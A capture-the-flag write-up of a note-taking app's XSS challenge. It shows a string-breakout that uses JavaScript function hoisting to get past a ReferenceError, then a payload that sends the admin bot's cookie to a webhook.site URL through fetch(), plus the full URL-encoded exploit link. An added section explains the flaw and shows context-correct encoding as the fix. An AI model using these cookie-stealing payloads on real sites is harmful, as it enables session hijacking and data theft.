
As we can see, there is a link and source code files, so I will go through them.

"The application allows creating notes via two input fields. The 'Contact Support' button redirects to the admin bot's reporting page."


"Initial testing with <script>alert()</script> revealed that < and > characters were being escaped to &lt; and &gt; respectively."

If you check the source code you will find in index.php:

So input sanitization is applied: all < and > characters are converted to &lt; and &gt; respectively. I will try to see where the input <script>alert()</script> is reflected.

I will try to bypass the < > sanitization using:

');alert('  // so when we inject it will be :
                           secure.validate('remove', '');alert('');

This also failed to alert :( but when you check the console:

The console reports secure is not defined. That means secure.validate('remove', ''); alert(''); throws before alert() can run.

Using hoisting, we can bypass this.

Hoisting: In JavaScript, hoisting means that function and variable declarations are moved to the top of their scope during compilation, before code execution.

The solution is to declare a secure function so it gets hoisted.

', alert()); 
function secure() {}; 
secure('

Finally, alert() runs.
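Why the first attempt throws while the hoisted one runs, and how encoding for the JavaScript-string context keeps the same input as data, shown as an added example that is not part of the original write-up. The reflected line is taken from the page; the helper names, the probe() stand-in for alert() and the Function-based harness are assumptions.

```javascript
// Constructed stand-in for the challenge filter: only < and > are entity-escaped.
function escapeAngleBrackets(s) {
  return s.replace(/</g, '&lt;').replace(/>/g, '&gt;');
}

// Reflection as shown in the write-up: the value lands inside a single-quoted JS string.
function renderVulnerable(input) {
  return "secure.validate('remove', '" + escapeAngleBrackets(input) + "');";
}

// Hardened: encode for the JS string context. JSON.stringify emits a quoted literal with
// quotes, backslashes and newlines escaped; <, > and U+2028/2029 are \u-escaped on top so
// the literal cannot close an inline <script> block or break older parsers.
function encodeForJsString(s) {
  return JSON.stringify(s).replace(/[<>\u2028\u2029]/g,
    (c) => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}
function renderHardened(input) {
  return "secure.validate('remove', " + encodeForJsString(input) + ");";
}

// Run script text where `secure` is undefined, as on the challenge page.
// probe() is a hypothetical stand-in for alert(): it only records that injected code ran.
function run(script) {
  let reached = false;
  let error = null;
  try {
    new Function('probe', script)(() => { reached = true; });
  } catch (e) {
    error = e.name;
  }
  return { reached, error };
}

// Constructed inputs mirroring the two attempts in the write-up.
const breakout = "');probe('";
const hoisted = "', probe());\nfunction secure() {};\nsecure('";

function demo() {
  return {
    // ReferenceError on `secure` aborts the script before probe() is reached.
    breakout: run(renderVulnerable(breakout)),
    // The later declaration is hoisted, so `secure` resolves; arguments are evaluated
    // before the engine notices secure.validate is not callable, so probe() runs first.
    hoisted: run(renderVulnerable(hoisted)),
    // Same input, context-correct encoding: it stays one string argument.
    hardened: run(renderHardened(hoisted)),
  };
}
console.log(demo());
```

In PHP, the same encoding comes from json_encode with the JSON_HEX_TAG, JSON_HEX_AMP, JSON_HEX_APOS and JSON_HEX_QUOT flags, written into the script without surrounding quotes.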


Now I need to find the flag using XSS, so I checked bot.js:

When the bot visits a URL from the admin report page, it accesses the page with a cookie named flag that contains our flag.

So the goal is to exploit an XSS vulnerability to steal the flag cookie.

Now I prepared my webhook ID to capture the bot's cookies with this payload:

', fetch("https://webhook.site/af2ed571-0b47-4c07-91e8-7e454114eec2/?Flag="+document.cookie));
function secure () {}; 
secure('

But before sending the payload, note where the bot's cookies are stored.

In docker-compose.yml, I found that the bot's cookies are stored at http://proxy

So now I will prepare my payload using the note, then exploit.

Final payload:

http://proxy/index.php?title=Test&content=http%3A%2F%2Fproxy%27%2C+fetch%28%22https%3A%2F%2Fwebhook.site%2Faf2ed571-0b47-4c07-91e8-7e454114eec2%2F%3FFlag%3D%22%2Bdocument.cookie%29%29%3B%0D%0Afunction+secure+%28%29+%7B%7D%3B+%0D%0Asecure%28%27&category=general
Finally!!!
Read more about XSS Exception Bypass using Hoisting.

I hope it will be helpful.